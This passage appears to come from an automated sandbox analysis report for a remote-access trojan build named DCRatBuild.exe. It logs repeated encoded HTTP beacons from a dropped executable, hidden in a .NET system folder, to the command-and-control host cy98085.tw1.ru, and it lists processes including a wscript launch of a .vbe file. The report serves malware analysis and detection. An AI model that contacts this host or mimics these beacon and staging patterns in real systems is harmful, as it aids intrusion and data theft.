[TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:11.367178917 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 79 59 35 63 44 4e 6b 4e 54 59 30 41 54 4f 31 63 54 4f 33 49 54 4e 69 68 44 4f 78 51 54 59 31 51 57 4d 6a 5a 6a 5a 77 59 44 5a 33 49 79 65 36 49 69 59 68 6c 54 4e 78 67 6a 59 6d 6c 7a 59 78 67 54 4f 77 4d 44 5a 6b 52 6d 59 34 45 54 5a 32 4d 32 4e 79 59 6a 4d 6a 5a 47 5a 79 49 79 65
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                    13         | 192.168.2.6 | 49911       | 185.114.245.123 | 80               | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:21:16.502609015 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:17.912933111 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                    14         | 192.168.2.6 | 49926       | 185.114.245.123 | 80               | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:21:23.049510002 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:24.407355070 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                    15         | 192.168.2.6 | 49942       | 185.114.245.123 | 80               | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:21:29.586147070 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:31.114972115 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                    16         | 192.168.2.6 | 49955       | 185.114.245.123 | 80               | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:21:36.239336967 CET2233OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive
                    Nov 23, 2024 02:21:37.641001940 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                    17         | 192.168.2.6 | 49971       | 185.114.245.123 | 80               | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:21:42.769056082 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:44.238723993 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                    18         | 192.168.2.6 | 49987       | 185.114.245.123 | 80               | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:21:49.362415075 CET2233OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive
                    Nov 23, 2024 02:21:50.766148090 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                    19         | 192.168.2.6 | 50002       | 185.114.245.123 | 80               | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:21:55.897264004 CET2209OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:21:57.261507034 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:21:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                    20         | 192.168.2.6 | 50018       | 185.114.245.123 | 80               | 7248 | C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:22:02.985508919 CET2183OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=QX9JiI6ICNwgTNiVDOlJWYiZTMzY2MmBzYwM2MwETMjdDNkRmMlJCLiQTMkFzYkNTZilTMjFDOwczMyQTOiJzYiNWOlljMyE2MhVDOwMWOycjI6ISNwUmMiRjZyIDNiVGNkBjYmJDO1MTZ3M2NwEGO0EmN1ICLiITN1gjZwcTYmdTM4UzN2MjZwQWZxIDNlFjNyIDOhNmYmRTYlBDO4EjI6IyN3ETYjZmZwI2YiVGMjFWMjZGOxUjZwMTOlhTM3YGOjJyes0nIwglT2k0QkFTOXpFdsdkV3Z1VaNnTsl0cJlnW1x2RjxmVHJGVKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Nov 23, 2024 02:22:04.465822935 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:22:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Session ID | Source IP   | Source Port | Destination IP  | Destination Port
                    21         | 192.168.2.6 | 50029       | 185.114.245.123 | 80
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 23, 2024 02:22:11.383502960 CET2233OUTGET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzY [TRUNCATED]
                    Accept: */*
                    Content-Type: text/csv
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                    Host: cy98085.tw1.ru
                    Connection: Keep-Alive
                    Nov 23, 2024 02:22:12.795928001 CET | 267 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.26.1
                    Date: Sat, 23 Nov 2024 01:22:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 104
                    Connection: keep-alive
                    Data Ascii: ==Qf9JiI6IyY5cDNkNTY0ATO1cTO3ITNihDOxQTY1QWMjZjZwYDZ3Iye6IiYhlTNxgjYmlzYxgTOwMDZkRmY4ETZ2M2NyYjMjZGZyIye


                    Target ID:0
                    Start time:20:19:58
                    Start date:22/11/2024
                    Path:C:\Users\user\Desktop\DCRatBuild.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\DCRatBuild.exe"
                    Imagebase:0xd60000
                    File size:1'165'973 bytes
                    MD5 hash:A92E55E04CC2026F53C97BDF0E91F6BA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:20:19:58
                    Start date:22/11/2024
                    Path:C:\Windows\SysWOW64\wscript.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe"
                    Imagebase:0x350000
                    File size:147'456 bytes
                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:20:20:03
                    Start date:22/11/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
